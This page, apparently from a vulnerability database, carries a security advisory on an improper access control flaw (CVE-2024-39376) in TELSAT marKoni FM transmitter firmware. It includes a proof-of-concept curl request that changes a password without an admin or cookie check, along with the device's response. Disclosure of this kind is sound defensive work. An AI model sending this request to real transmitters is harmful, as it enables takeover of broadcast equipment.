Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password

🗓️ 31 Jan 2024 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 299 Views

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password. Unauthorized access & security bypass risk

Related
Code
ReporterTitlePublishedViews
Family
CVE		CVE-2024-39376
27 Jun 202416:13
cve
Cvelist		CVE-2024-39376 Improper Access Control In TELSAT MarKoni FM Transmitter
27 Jun 202416:13
cvelist
EUVD		EUVD-2024-37926
3 Oct 202520:07
euvd
ICS		TELSAT marKoni FM Transmitter
27 Jun 202406:00
ics
NVD		CVE-2024-39376
27 Jun 202416:15
nvd
OSV		CVE-2024-39376
27 Jun 202416:15
osv
Positive Technologies		PT-2024-28477 · Telsat · Telsat Markoni Fm Transmitters
27 Jun 202400:00
ptsecurity
RedhatCVE		CVE-2024-39376
9 Jan 202608:32
redhatcve
Vulnrichment		CVE-2024-39376 Improper Access Control In TELSAT MarKoni FM Transmitter
27 Jun 202416:13
vulnrichment
<html><body><p>TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password


Vendor: TELSAT Srl
Product web page: https://www.markoni.it
Affected version: Markoni-D (Compact) FM Transmitters
                  Markoni-DH (Exciter+Amplifiers) FM Transmitters
                  Markoni-A (Analogue Modulator) FM Transmitters
                  Firmware: 1.9.5
                            1.9.3
                            1.5.9
                            1.4.6
                            1.3.9

Summary: Professional FM transmitters.

Desc: Unauthorized user could exploit this vulnerability to change
his/her password, potentially gaining unauthorized access to sensitive
information or performing actions beyond her/his designated permissions.

Tested on: GNU/Linux 3.10.53 (armv7l)
           icorem6solox
           lighttpd/1.4.33


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2024-5811
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php


10.11.2023

--


PoC request of a user changing his own password.
Only admin can edit users. No permissions or Cookie check.

$ curl -s -H "Cookie: name=user-1702119917" \
http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&amp;username=user&amp;password=user&amp;newpassword=t00tw00t

HTTP/1.1 200 OK
Content-type: text/html
Cache-control: no-cache
Set-Cookie: name=user-1702119917; max-age=315360000
Transfer-Encoding: chunked
Date: Sat, 9 Dec 2023 11:05:17 GMT
Server: lighttpd/1.4.33

oc=4&amp;resp=0
</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Jan 2024 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8
CVSS 49.3
EPSS0.00155
SSVC
telsat markoni fm transmitterinsecure access controlchange passwordsecurity bypasscross-site scriptingvendor statusvulnerability discoveredgnu/linux 3.10.53firmware 1.9.5
299